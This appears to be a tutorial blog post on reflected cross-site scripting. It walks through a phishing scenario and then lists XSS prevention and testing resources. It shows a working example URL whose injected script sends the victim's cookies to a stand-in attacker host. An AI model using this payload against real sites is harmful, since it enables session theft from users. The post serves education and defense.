Go to main post
Cross Site Scripting (XSS)
Cross Site Scripting(XSS) is a flaw in a website that allows an attacker to insert malicious content onto the page returned from the web server. This is typically accomplished by constructing a URL that points to the target website (one that is vulnerable to cross-site scripting). The malicious link is designed to inject malicious commands or HTML that will be redirected back to the person clicking the link. The attacker then attempts to get a victim to click the link.
Let’s look at a phishing attack. A hacker, posing as the administrator of a popular site, sends you an email asking you to click on a link for some fictitious reason. The link is to a page with a cross-site scripting vulnerability. The page takes the name of a product as a parameter, and if the product is not found it returns back an error message saying that the product is not found:
https://www.fakesite.com/products.php?product_name=cellphone
This URL returns the following simplified HTML. Note the product name is sent back in the HTML:
<html><body>Could not find the product cellphone</body></html>
The attacker sends you a link instead that looks like this:
http://www.fakesite.com/products.php?product_name=<script>document
.location='http://www.hacker.com/cgi-bin/cookie.cgi?'%20+document
.cookie</script>
This URL returns the following HTML:
<html><body>Could not find the product
<script>document.location='http://www.hacker.com/cgi-bin/cookie
.cgi?'%20+document.cookie</script></body></html>
When a user clicks the link, it will open the target website and run the JavaScript in the victim’s browser causing the victim’s cookies to be sent to the attacker’s website.
At the other end, the hacker is waiting for these cookies to come across and then use them to login into the target website as the victim. [Source]
Cross-Site Scripting poses server application risks that include, but are not limited to, the following:
More on XSS (Cross Site Scripting)
1. XSS (Cross Site Scripting) Prevention Cheat Sheet - XSS Prevention Rules etc
2. Below link contains FAQs about Cross Site Scripting like What is Cross Site Scripting?, What are the threats of Cross Site Scripting?, How common are CSS/XSS holes?, What can I do to protect myself as a user? etc
cgisecurity
3. The Anatomy of Cross Site Scripting: Anatomy, Discovery, Attack, Exploitation
net-security.org
4. Full explanation – the cross-site scripting technique, its Scope and feasibility, ways to perform (traditional) CSS attacks, Securing a site against CSS attacks, How to check if your site is protected from CSS etc.
XSS.pdf
5. Fun Cross Site Scripting Example
6. Below link includes - What is Cross Site Scripting?, The repercussions of XSS, A practical example of XSS on a test site etc.
windowsecurity
7. XSS (Cross Site Scripting) Cheat Sheet
Esp: for filter evasion
8. Includes Description of Cross-site scripting Vulnerabilities, How to Avoid Cross-site scripting Vulnerabilities, How to Review Code for Cross-site scripting Vulnerabilities
Testing for Cross site scripting
9. Below link shows how you can help protect your ASP.NET applications from cross-site scripting attacks by using proper input validation techniques and by encoding the output.
How To: Prevent Cross-Site Scripting in ASP.NET
10. Google XSS Vulnerability - The recent cross-site scripting (XSS) vulnerability discovered in Google perfectly illustrates why character encoding matters
11. Cross-site scripting: are your web applications vulnerable? - Includes Introduction to Cross-site scripting, an advanced cross-site scripting attack, Prevention etc (Please look under White Papers)
12. Cross Site Scripting - Understanding the vulnerability and payload
Also See:
Cookie Testing
SQL Injection